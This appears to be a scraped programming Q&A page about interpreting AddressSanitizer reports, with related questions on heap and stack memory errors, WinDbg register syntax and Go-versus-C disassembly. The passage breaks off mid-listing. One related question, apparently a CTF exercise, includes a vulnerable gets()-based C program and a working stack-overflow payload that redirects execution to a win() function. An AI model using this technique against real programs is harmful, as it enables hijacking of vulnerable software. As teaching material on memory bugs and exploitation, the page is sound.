Understanding ASAN summary - gcc

The example below is from an ASAN report caused by a heap-use-after-free on address 0x6040000a06b0.
How would I be able to tell that this was a heap use after free error solely from looking at this summary?
SUMMARY: AddressSanitizer: heap-use-after-free /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:826 in __interceptor_memcmp
Shadow bytes around the buggy address:
0x0c088000c080: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c090: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c0a0: fa fa fa fa fd fd fd fa fa fa fa fa fd fd fd fa
0x0c088000c0b0: fa fa fa fa fd fd fd fd fa fa fa fa 00 00 00 fa
0x0c088000c0c0: fa fa fa fa 00 00 00 fa fa fa fa fa 00 00 00 fa
=>0x0c088000c0d0: fa fa fa fa fd fd[fd]fa fa fa fa fa 00 00 00 fa
0x0c088000c0e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c0f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c088000c120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
More broadly, I am wondering what information I should be extracting, and how to tell specifically what the error is from the above summary.
Would one be able to preemptively see additional ASAN errors if they happened to appear in this summary?

Each 8-byte chunk of user memory is mapped to a single byte of ASan's shadow memory. If the whole chunk is addressable, its shadow byte is 0; a value k from 1 to 7 means that only the first k bytes of the chunk are addressable. Any other value tells the ASan runtime that the memory is invalid, i.e. it was freed, its stack frame was deallocated, or something similar. In particular, fd means that address 0x6040000a06b0 points into a freed heap buffer (the same is true for the preceding 16 bytes, by the way: the two shadow bytes before the bracketed one are also fd).
Details about particular values are explained in the shadow byte legend at the end of the error message (reproduced in full in the question): fd is "Freed heap region" and fa is "Heap left redzone".
As for your other question, the main error message is
SUMMARY: AddressSanitizer: heap-use-after-free /build/gcc/src/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:826 in __interceptor_memcmp
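It tells you the error type and its location in the code: here the invalid access happened inside ASan's interceptor for memcmp, so a pointer to the freed buffer was passed to a memcmp call.
Normally the report will also include the full stack trace of the bad access, the stack trace of the free() call that released the memory, and the historical stack trace of the original malloc() call (I'm not sure why they are not included in your message).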

Related

Memory troubles in a DIY gcc csv reader

Writing some code to reformat some CSV data.
It's been a while since I was working in C and doing programming with memory management this raw, and I don't have a lot of experience with many of the tools for debugging memory allocation.
Diving right in I found some forum posts suggesting compiling like this to figure out where the segmentation fault was originating.
gcc -o CSVreader_v0.0-memcheck -static-libasan -O -g -fsanitize=address -fno-omit-frame-pointer -Wall -Wno-unused-result CSVreader.c
My only problem is that I have no idea how to interpret the output. Can someone walk me through it, or point me to a guide on what all this means?
==9474==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000015 at pc 0x7f1a330533a6 bp 0x7ffedc0840d0 sp 0x7ffedc083878
WRITE of size 6 at 0x602000000015 thread T0
#0 0x7f1a330533a5 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
#1 0x55a46460155a in parseRow (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x155a)
#2 0x55a4646018e5 in parseCSV (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x18e5)
#3 0x55a464601c7b in main (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x1c7b)
#4 0x7f1a32e220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#5 0x55a46460122d in _start (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x122d)
0x602000000015 is located 0 bytes to the right of 5-byte region [0x602000000010,0x602000000015)
allocated by thread T0 here:
#0 0x7f1a330cbb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x55a4646014f1 in parseRow (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x14f1)
#2 0x55a4646018e5 in parseCSV (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x18e5)
#3 0x55a464601c7b in main (/home/kodachi/workspace/Tactical Engram/CSVreader_v0.0+0x1c7b)
#4 0x7f1a32e220b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
Shadow bytes around the buggy address:
0x0c047fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c047fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c047fff8000: fa fa[05]fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==9474==ABORTING
I'd like to understand what all this means, but it would equally help if someone could point me to a way to get more human-readable output. I tried valgrind, but I'm not sure I was using it correctly.
Right now my code is taking the first line of the csv file using
fscanf(fp, "%[^\n]\n", line_buffer);
with char* line_buffer, and char** hStrings to store the column headers. I pass &line_buffer and &hStrings into the following function, which parses the column headers in the line_buffer string into hStrings, using '|' as the delimiter.
/**
 * Split str around the '|' character and store the data in dStr
 **/
int parseRow(char** str, char*** dStr)
{
    unsigned int columns = 0;
    char* col;
    printf("Splitting: %s\n", *str);
    col = strsep(str, "|");
    while(col != NULL && hasPrint(col, 0, strlen(col)))
    {
        printf("\n");
        (*dStr)[columns] = malloc(strlen(col)*sizeof(char));
        strcpy((*dStr)[columns], col);
        columns++;
        col = strsep(str, "|");
    }
    //printf("\n");
    printf("counted: %d columns\n", columns);
    return columns;
}
Before I was using -fsanitize=address, the program would run this part correctly, and a segmentation fault would occur later when I was parsing the rows of data, not the column headers. Now it generates the output I provided while it is working on the first row, which contains the headers. Not sure if that helps explain what's going on here.

Buffer overflow: overwrite CH

I have a program that is vulnerable to buffer overflow. The function that is vulnerable takes 2 arguments. The first is a standard 4 bytes. For the second however, the program performs the following:
xor ch, 0
...
cmp dword ptr [ebp+10h], 0F00DB4BE
Now, if I supply two different 4-byte arguments as part of my exploit, i.e. ABCDEFGH (assume ABCD is the first argument and EFGH the second), CH becomes G. So naturally I thought about crafting the following (assume ABCD is right):
ABCD\x00\x0d\x00\x00
What happens, however, is that null bytes seem to be ignored! Sending the above results in CH = 0 and CL = 0xd. This happens no matter where I put \x0d, i.e.:
ABCD\x0d\x00\x00\x00
ABCD\x00\x0d\x00\x00
ABCD\x00\x00\x0d\x00
ABCD\x00\x00\x00\x0d
all yield that same behavior.
How can I proceed to only overwrite CH while leaving the rest of ECX as null?
EDIT: see my own answer below. The short version is that bash ignores null bytes, which partially explains why the exploit didn't work locally. The exact reason can be found here. Thanks to Michael Petch for pointing it out!
Source:
#include <stdio.h>
#include <stdlib.h>
void win(long long arg1, int arg2)
{
    if (arg1 != 0x14B4DA55 || arg2 != 0xF00DB4BE)
    {
        puts("Close, but not quite.");
        exit(1);
    }
    printf("You win!\n");
}
void vuln()
{
    char buf[16];
    printf("Type something>");
    gets(buf);
    printf("You typed %s!\n", buf);
}
int main()
{
    /* Disable buffering on stdout */
    setvbuf(stdout, NULL, _IONBF, 0);
    vuln();
    return 0;
}
The relevant part of objdump's disassembly of the executable is:
080491c2 <win>:
80491c2: 55 push %ebp
80491c3: 89 e5 mov %esp,%ebp
80491c5: 81 ec 28 01 00 00 sub $0x128,%esp
80491cb: 8b 4d 08 mov 0x8(%ebp),%ecx
80491ce: 89 8d e0 fe ff ff mov %ecx,-0x120(%ebp)
80491d4: 8b 4d 0c mov 0xc(%ebp),%ecx
80491d7: 89 8d e4 fe ff ff mov %ecx,-0x11c(%ebp)
80491dd: 8b 8d e0 fe ff ff mov -0x120(%ebp),%ecx
80491e3: 81 f1 55 da b4 14 xor $0x14b4da55,%ecx
80491e9: 89 c8 mov %ecx,%eax
80491eb: 8b 8d e4 fe ff ff mov -0x11c(%ebp),%ecx
80491f1: 80 f5 00 xor $0x0,%ch
80491f4: 89 ca mov %ecx,%edx
80491f6: 09 d0 or %edx,%eax
80491f8: 85 c0 test %eax,%eax
80491fa: 75 09 jne 8049205 <win+0x43>
80491fc: 81 7d 10 be b4 0d f0 cmpl $0xf00db4be,0x10(%ebp)
8049203: 74 1a je 804921f <win+0x5d>
8049205: 83 ec 0c sub $0xc,%esp
8049208: 68 08 a0 04 08 push $0x804a008
804920d: e8 4e fe ff ff call 8049060 <puts@plt>
8049212: 83 c4 10 add $0x10,%esp
8049215: 83 ec 0c sub $0xc,%esp
8049218: 6a 01 push $0x1
804921a: e8 51 fe ff ff call 8049070 <exit@plt>
804921f: 83 ec 0c sub $0xc,%esp
8049222: 68 1e a0 04 08 push $0x804a01e
8049227: e8 34 fe ff ff call 8049060 <puts@plt>
804922c: 83 c4 10 add $0x10,%esp
804922f: 83 ec 08 sub $0x8,%esp
8049232: 68 27 a0 04 08 push $0x804a027
8049237: 68 29 a0 04 08 push $0x804a029
804923c: e8 5f fe ff ff call 80490a0 <fopen@plt>
8049241: 83 c4 10 add $0x10,%esp
8049244: 89 45 f4 mov %eax,-0xc(%ebp)
8049247: 83 7d f4 00 cmpl $0x0,-0xc(%ebp)
804924b: 75 12 jne 804925f <win+0x9d>
804924d: 83 ec 0c sub $0xc,%esp
8049250: 68 34 a0 04 08 push $0x804a034
8049255: e8 06 fe ff ff call 8049060 <puts@plt>
804925a: 83 c4 10 add $0x10,%esp
804925d: eb 31 jmp 8049290 <win+0xce>
804925f: 83 ec 04 sub $0x4,%esp
8049262: ff 75 f4 pushl -0xc(%ebp)
8049265: 68 00 01 00 00 push $0x100
804926a: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049270: 50 push %eax
8049271: e8 da fd ff ff call 8049050 <fgets@plt>
8049276: 83 c4 10 add $0x10,%esp
8049279: 83 ec 08 sub $0x8,%esp
804927c: 8d 85 f4 fe ff ff lea -0x10c(%ebp),%eax
8049282: 50 push %eax
8049283: 68 86 a0 04 08 push $0x804a086
8049288: e8 a3 fd ff ff call 8049030 <printf@plt>
804928d: 83 c4 10 add $0x10,%esp
8049290: 90 nop
8049291: c9 leave
8049292: c3 ret
08049293 <vuln>:
8049293: 55 push %ebp
8049294: 89 e5 mov %esp,%ebp
8049296: 83 ec 18 sub $0x18,%esp
8049299: 83 ec 0c sub $0xc,%esp
804929c: 68 90 a0 04 08 push $0x804a090
80492a1: e8 8a fd ff ff call 8049030 <printf@plt>
80492a6: 83 c4 10 add $0x10,%esp
80492a9: 83 ec 0c sub $0xc,%esp
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets@plt>
80492b5: 83 c4 10 add $0x10,%esp
80492b8: 83 ec 08 sub $0x8,%esp
80492bb: 8d 45 e8 lea -0x18(%ebp),%eax
80492be: 50 push %eax
80492bf: 68 a0 a0 04 08 push $0x804a0a0
80492c4: e8 67 fd ff ff call 8049030 <printf@plt>
80492c9: 83 c4 10 add $0x10,%esp
80492cc: 90 nop
80492cd: c9 leave
80492ce: c3 ret
080492cf <main>:
80492cf: 8d 4c 24 04 lea 0x4(%esp),%ecx
80492d3: 83 e4 f0 and $0xfffffff0,%esp
80492d6: ff 71 fc pushl -0x4(%ecx)
80492d9: 55 push %ebp
80492da: 89 e5 mov %esp,%ebp
80492dc: 51 push %ecx
80492dd: 83 ec 04 sub $0x4,%esp
80492e0: a1 34 c0 04 08 mov 0x804c034,%eax
80492e5: 6a 00 push $0x0
80492e7: 6a 02 push $0x2
80492e9: 6a 00 push $0x0
80492eb: 50 push %eax
80492ec: e8 9f fd ff ff call 8049090 <setvbuf@plt>
80492f1: 83 c4 10 add $0x10,%esp
80492f4: e8 9a ff ff ff call 8049293 <vuln>
80492f9: b8 00 00 00 00 mov $0x0,%eax
80492fe: 8b 4d fc mov -0x4(%ebp),%ecx
8049301: c9 leave
8049302: 8d 61 fc lea -0x4(%ecx),%esp
8049305: c3 ret
It is unclear why you are hung up on the value in ECX or the xor ch, 0 instruction inside the win function. From the C code it is clear that a win requires the 64-bit (long long) arg1 to be 0x14B4DA55 and arg2 to be 0xF00DB4BE. When that condition is met, it will print You win!
We need some kind of buffer exploit that has the capability to execute the win function and make it appear that it is being passed a first argument (64-bit long long) and a 32-bit int as a second parameter.
The most obvious way to pull this off is to overrun buf in function vuln so that it strategically overwrites the return address, replacing it with the address of win. In the disassembled output, win is at 0x080491c2. We will need to write 0x080491c2, followed by some dummy value for a return address, followed by the 64-bit value 0x14B4DA55 (same as 0x0000000014B4DA55), followed by the 32-bit value 0xF00DB4BE.
The dummy value for a return address is needed because we need to simulate a function call on the stack. We won't be issuing a call instruction, so we have to make it appear as if one had been done. The goal is to print You win!; whether the program crashes after that isn't relevant.
The return address (win), arg1, and arg2 have to be stored with their bytes in reverse order, since x86 processors are little-endian.
The last big question is how many bytes do we have to feed to gets to overrun the buffer to reach the return address? You could use trial and error (bruteforce) to figure this out, but we can look at the disassembly of the call to gets:
80492ac: 8d 45 e8 lea -0x18(%ebp),%eax
80492af: 50 push %eax
80492b0: e8 8b fd ff ff call 8049040 <gets@plt>
LEA is being used to compute the address (Effective Address) of buf on the stack and passing that as the first argument to gets. 0x18 is 24 bytes (decimal). Although buf was defined to be 16 bytes in length the compiler also allocated additional space for alignment purposes. We have to add an additional 4 bytes to account for the fact that the function prologue pushed EBP on the stack. That is a total of 28 bytes (24+4) to reach the position of the return address on the stack.
Using Python to generate the input sequence is common in many tutorials (the command below uses Python 2 print syntax). Embedding NUL (\0) characters directly in a shell string may cause a shell program to terminate the string prematurely at the NUL byte (an issue people run into with Bash). Instead, we can pipe the byte sequence to our program using something like:
python -c 'print "A"*28+"\xc2\x91\x04\x08" \
+"B"*4+"\x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0"' | ./progname
Where progname is the name of your executable. When run it should appear similar to:
Type something>You typed AAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBUڴ!
You win!
Segmentation fault
Note: the 4 characters making up the return address between the A's and B's are unprintable so they don't appear in the console output but they are still present as well as all the other unprintable characters.
As a limited answer to my own question, specifically regarding why null bytes are ignored:
It seems to be an issue with bash ignoring null bytes.
Many of my peers faced the same problem when writing the exploit. It would work on the server but not locally, when using gdb for example. Bash would simply discard the null bytes, so \x55\xda\xb4\x14\x00\x00\x00\x00\xbe\xb4\x0d\xf0 would be read in as \x55\xda\xb4\x14\xbe\xb4\x0d\xf0. The exact reason why it behaves that way still eludes me, but it's a good thing to keep in mind!

Armadillo and OpenMP and stack-use-after-scope

I have an issue with a stack-use-after-scope error with the C++ Armadillo library within an OpenMP block in an R package, and I cannot figure out what is wrong. The complete gcc log from the CRAN GCC ASAN check of the R package is here. I have kept the relevant part of the log below:
==33791==ERROR: AddressSanitizer: stack-use-after-scope on address 0x7ffd03364940 at pc 0x7ff8127abc07 bp 0x7ffd03364680 sp 0x7ffd03364670
WRITE of size 4 at 0x7ffd03364940 thread T0
#0 0x7ff8127abc06 in arma::Mat<double>::Mat(double*, unsigned int, unsigned int, bool, bool) /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Mat_meat.hpp:1215
#1 0x7ff8129fb0c2 in GMA<logistic>::solve() [clone ._omp_fn.0] /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Col_meat.hpp:411
#2 0x7ff825ae2cde in GOMP_parallel (/lib64/libgomp.so.1+0xdcde)
#3 0x7ff812a0c9f8 in GMA<logistic>::solve() ddhazard/GMA_solver.cpp:83
#4 0x7ff81276421d in ddhazard_fit_cpp(...
Address 0x7ffd03364940 is located in stack of thread T0 at offset 416 in frame
#0 0x7ff8129fa82f in GMA<logistic>::solve() [clone ._omp_fn.0] ddhazard/GMA_solver.cpp:83
This frame has 5 object(s):
[32, 40) 'dest'
[96, 104) 'src'
[160, 176) 'ans'
[224, 384) 'my_X_cross'
[416, 576) '<unknown>' <== Memory access at offset 416 is inside this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-use-after-scope /data/gannet/ripley/R/test-3.5/RcppArmadillo/include/armadillo_bits/Mat_meat.hpp:1215 in arma::Mat<double>::Mat(double*, unsigned int, unsigned int, bool, bool)
Shadow bytes around the buggy address:
0x1000206648d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000206648e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000206648f0: 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2 f2 f2 f2 f2
0x100020664900: 00 f2 f2 f2 f2 f2 f2 f2 f8 f8 f2 f2 f2 f2 f2 f2
0x100020664910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x100020664920: 00 00 00 00 f2 f2 f2 f2[f8]f8 f8 f8 f8 f8 f8 f8
0x100020664930: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3
0x100020664940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100020664970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==33791==ABORTING
The WRITE that causes the error is in the dynamichazard/src/ddhazard/GMA_solver.cpp and particularly this OpenMP block
#ifdef _OPENMP
int n_threads = std::max(1, std::min(omp_get_max_threads(),
                                     (int)r_set.n_elem / 1000 + 1));
#pragma omp parallel num_threads(n_threads) if(n_threads > 1)
{
#endif
  arma::mat my_X_cross(q, q, arma::fill::zeros);
#ifdef _OPENMP
#pragma omp for schedule(static)
#endif
  for(arma::uword i = 0; i < r_set.n_elem; i++){
    auto trunc_eta = T::truncate_eta(
      is_event[i], eta[i], exp(eta[i]), at_risk_length[i]);
    h_1d[i] = w[i] * T::d_log_like(
      is_event[i], trunc_eta, at_risk_length[i]);
    double h_2d_neg = - w[i] * T::dd_log_like(
      is_event[i], trunc_eta, at_risk_length[i]);
    sym_mat_rank_one_update(h_2d_neg, X_t.unsafe_col(i), my_X_cross);
  }
#ifdef _OPENMP
#pragma omp critical(gma_lock)
  {
#endif
    X_cross += my_X_cross;
#ifdef _OPENMP
  }
}
#endif
As far as I can tell, the error is at the X_t.unsafe_col(i) call in the call to sym_mat_rank_one_update. The declaration of the function is
void sym_mat_rank_one_update(const double, const arma::vec&, arma::mat&);
It should trigger a call to the arma::Col<double> constructor in line 411 of include/armadillo_bits/Col_meat.hpp, which calls the arma::Mat<double> base-class constructor in line 1215 of include/armadillo_bits/Mat_meat.hpp. I gather this is where the 4-byte write (WRITE of size 4) to one of the unsigned int members occurs, since the arma::Mat<double> constructor is
template<typename eT>
inline
Mat<eT>::Mat(eT* aux_mem, const uword aux_n_rows, const uword aux_n_cols, const bool copy_aux_mem, const bool strict)
  : n_rows   ( aux_n_rows )
  , n_cols   ( aux_n_cols )
  , n_elem   ( aux_n_rows*aux_n_cols )
  , vec_state( 0 )
  , mem_state( copy_aux_mem ? 0 : ( strict ? 2 : 1 ) )
  , mem      ( copy_aux_mem ? 0 : aux_mem )
{
  arma_extra_debug_sigprint_this(this);
  if(copy_aux_mem == true)
  {
    init_cold();
    arrayops::copy( memptr(), aux_mem, n_elem );
  }
}
where
template<typename eT>
class Mat : public Base< eT, Mat<eT> >
{
public:
  typedef eT elem_type;  //!< the type of elements stored in the matrix
  typedef typename get_pod_type<eT>::result pod_type;  //!< if eT is std::complex<T>, pod_type is T; otherwise pod_type is eT
  const uword n_rows;     //!< number of rows (read-only)
  const uword n_cols;     //!< number of columns (read-only)
  const uword n_elem;     //!< number of elements (read-only)
  const uhword vec_state; //!< 0: matrix layout; 1: column vector layout; 2: row vector layout
  const uhword mem_state;
  ...
See include/armadillo_bits/Mat_bones.hpp and notice that arma::uword is unsigned int. However, I cannot figure out why this would cause a stack-use-after-scope.
A similar error is in the Morpho package. See the current CRAN log here and src/createL.cpp.
Setup
The above check is on CRAN. As far as I can tell, it is with gcc 7.2 on Fedora 26 with the following config.site used to build R
CXX="g++ -fsanitize=address,undefined,bounds-strict -fno-omit-frame-pointer"
CFLAGS="-g -O2 -Wall -pedantic -mtune=native -fsanitize=address"
FFLAGS="-g -O2 -mtune=native"
FCFLAGS="-g -O2 -mtune=native"
CXXFLAGS="-g -O2 -Wall -pedantic -mtune=native"
MAIN_LDFLAGS=-fsanitize=address,undefined
Further, the following ~/.R/Makevars is used
CC = gcc -std=gnu99 -fsanitize=address,undefined -fno-omit-frame-pointer
F77 = gfortran -fsanitize=address
FC = gfortran -fsanitize=address
FCFLAGS = -g -O2 -mtune=native -fbounds-check
FFLAGS = -g -O2 -mtune=native -fbounds-check
The error does not happen with clang 5.0.0 and valgrind on the same machine. Further, I cannot reproduce them on a local Ubuntu 17.04 with gcc version 6.3 and clang version 4.0.0.
Minimal, Complete, and Verifiable example
I will work on making one.

In WinDbg commands, how can I refer to a register with the same name as a global variable?

Suppose I want to debug this program using the WinDbg, cdb, or ntsd debuggers for Windows:
/* test.c */
#include <stdio.h>
int rip = 42;
int main(void)
{
    puts("Hello world!");
    return (0);
}
I compile the program for AMD64 and run it under WinDbg. I set a breakpoint at main(), and when the breakpoint hits, I want to inspect the value in the RIP register (the program counter), and the memory around that value if the value is treated as a pointer.
I can see the value of the register directly with r rip, but when I try to look at the memory around that address, WinDbg shows me a different address! Having read the symbols in test.pdb, WinDbg sees that rip is a global variable declared in the C code and shows me the memory around &rip.
0:000> bu test!main
0:000> g
Breakpoint 0 hit
test!main:
00007ff6`de1868d0 4883ec28 sub rsp,28h
0:000> r rip
rip=00007ff6de1868d0
0:000> db rip
00007ff6`de1f2000 2a 00 00 00 ff ff ff ff-01 00 00 00 00 00 00 00 *...............
00007ff6`de1f2010 01 00 00 00 02 00 00 00-ff ff ff ff ff ff ff ff ................
00007ff6`de1f2020 00 00 00 00 00 00 00 00-43 46 92 e5 1b df 00 00 ........CF......
00007ff6`de1f2030 bc b9 6d 1a e4 20 ff ff-00 00 00 00 00 00 00 00 ..m.. ..........
00007ff6`de1f2040 00 01 00 00 00 00 00 00-ca b0 1e de f6 7f 00 00 ................
00007ff6`de1f2050 00 00 00 00 00 80 00 00-00 00 00 00 00 80 00 00 ................
00007ff6`de1f2060 d0 66 fc c2 f2 01 03 00-ab 90 ec 5e 22 c0 b2 44 .f.........^"..D
00007ff6`de1f2070 a5 dd fd 71 6a 22 2a 15-00 00 00 00 00 00 00 00 ...qj"*.........
0:000> ? rip
Evaluate expression: 140698265264128 = 00007ff6`de1f2000
0:000> ? dwo(rip)
Evaluate expression: 42 = 00000000`0000002a
This is really annoying, but as long as I'm aware of it, it isn't a problem when manually reading data like this. But if I want to use the register value, for example in scripting the debugger, then there is no easy workaround:
0:000> bu test!main ".if (dwo(rip) == 0n42) { .echo Whoops! I don't want to get here! }"
0:000> g
Whoops! I don't want to get here!
test!main:
00007ff6`de1868d0 4883ec28 sub rsp,28h
This problem, that symbols in the program hide register names, makes things really difficult for me. An actual scenario this broke:
I wanted to set a breakpoint on CreateFileW(), a very commonly called Windows API function.
Since I only cared about one particular file, I wanted to inspect the filename, which is passed in the RCX register, and continue past the breakpoint unless the filename matched the file I wanted.
But I couldn't write this condition, because another module in the program defined a symbol foobar!rcx, and any references to rcx I make in the command to execute on the breakpoint refer to that global variable!
So how do I tell WinDbg that yes, I really meant to read the register? And what if I want to write that register? There must be a simple thing I am missing here.
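As noted in passing by another question, you can put an at sign (@) in front of a register name to force it to be interpreted as a register or pseudo-register, bypassing the attempt to parse it as a hexadecimal number or a symbol. For example, db @rip dumps memory at the value of the RIP register even when a symbol named rip exists, and a breakpoint condition can test @rcx instead of foobar!rcx.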
Registers and Pseudo-Registers in MASM Expressions
You can use registers and pseudo-registers within MASM expressions. You can add an at sign (@) before all registers and pseudo-registers. The at sign causes the debugger to access the value more quickly. This at sign is unnecessary for the most common x86-based registers. For other registers and pseudo-registers, we recommend that you add the at sign, but it is not actually required. If you omit the at sign for the less common registers, the debugger tries to parse the text as a hexadecimal number, then as a symbol, and finally as a register.

golang: index efficiency of array

It's a simple program.
test environment: debian 8, go 1.4.2
union.go:
package main
import "fmt"
type A struct {
	t int32
	u int64
}
func test() (total int64) {
	a := [...]A{{1, 100}, {2, 3}}
	for i := 0; i < 5000000000; i++ {
		p := &a[i%2]
		total += p.u
	}
	return
}
func main() {
	total := test()
	fmt.Println(total)
}
union.c:
#include <stdio.h>
struct A {
    int t;
    long u;
};
long test()
{
    struct A a[2];
    a[0].t = 1;
    a[0].u = 100;
    a[1].t = 2;
    a[1].u = 3;
    long total = 0;
    long i;
    for (i = 0; i < 5000000000; i++) {
        struct A* p = &a[i % 2];
        total += p->u;
    }
    return total;
}
int main()
{
    long total = test();
    printf("%ld\n", total);
}
result compare:
go:
257500000000
real 0m9.167s
user 0m9.196s
sys 0m0.012s
C:
257500000000
real 0m3.585s
user 0m3.560s
sys 0m0.008s
It seems that Go compiles to a lot of odd-looking assembly code (you can use objdump -D to check it).
For example, why movabs $0x12a05f200,%rbp appears twice?
400c60: 31 c0 xor %eax,%eax
400c62: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400c69: 00 00 00
400c6c: 48 39 e8 cmp %rbp,%rax
400c6f: 7d 46 jge 400cb7 <main.test+0xb7>
400c71: 48 89 c1 mov %rax,%rcx
400c74: 48 c1 f9 3f sar $0x3f,%rcx
400c78: 48 89 c3 mov %rax,%rbx
400c7b: 48 29 cb sub %rcx,%rbx
400c7e: 48 83 e3 01 and $0x1,%rbx
400c82: 48 01 cb add %rcx,%rbx
400c85: 48 8d 2c 24 lea (%rsp),%rbp
400c89: 48 83 fb 02 cmp $0x2,%rbx
400c8d: 73 2d jae 400cbc <main.test+0xbc>
400c8f: 48 6b db 10 imul $0x10,%rbx,%rbx
400c93: 48 01 dd add %rbx,%rbp
400c96: 48 8b 5d 08 mov 0x8(%rbp),%rbx
400c9a: 48 01 f3 add %rsi,%rbx
400c9d: 48 89 de mov %rbx,%rsi
400ca0: 48 89 5c 24 28 mov %rbx,0x28(%rsp)
400ca5: 48 ff c0 inc %rax
400ca8: 48 bd 00 f2 05 2a 01 movabs $0x12a05f200,%rbp
400caf: 00 00 00
400cb2: 48 39 e8 cmp %rbp,%rax
400cb5: 7c ba jl 400c71 <main.test+0x71>
400cb7: 48 83 c4 20 add $0x20,%rsp
400cbb: c3 retq
400cbc: e8 6f e0 00 00 callq 40ed30 <runtime.panicindex>
400cc1: 0f 0b ud2
...
while the C assembly is cleaner:
0000000000400570 <test>:
400570: 48 c7 44 24 e0 64 00 movq $0x64,-0x20(%rsp)
400577: 00 00
400579: 48 c7 44 24 f0 03 00 movq $0x3,-0x10(%rsp)
400580: 00 00
400582: b9 64 00 00 00 mov $0x64,%ecx
400587: 31 d2 xor %edx,%edx
400589: 31 c0 xor %eax,%eax
40058b: 48 be 00 f2 05 2a 01 movabs $0x12a05f200,%rsi
400592: 00 00 00
400595: eb 18 jmp 4005af <test+0x3f>
400597: 66 0f 1f 84 00 00 00 nopw 0x0(%rax,%rax,1)
40059e: 00 00
4005a0: 48 89 d1 mov %rdx,%rcx
4005a3: 83 e1 01 and $0x1,%ecx
4005a6: 48 c1 e1 04 shl $0x4,%rcx
4005aa: 48 8b 4c 0c e0 mov -0x20(%rsp,%rcx,1),%rcx
4005af: 48 83 c2 01 add $0x1,%rdx
4005b3: 48 01 c8 add %rcx,%rax
4005b6: 48 39 f2 cmp %rsi,%rdx
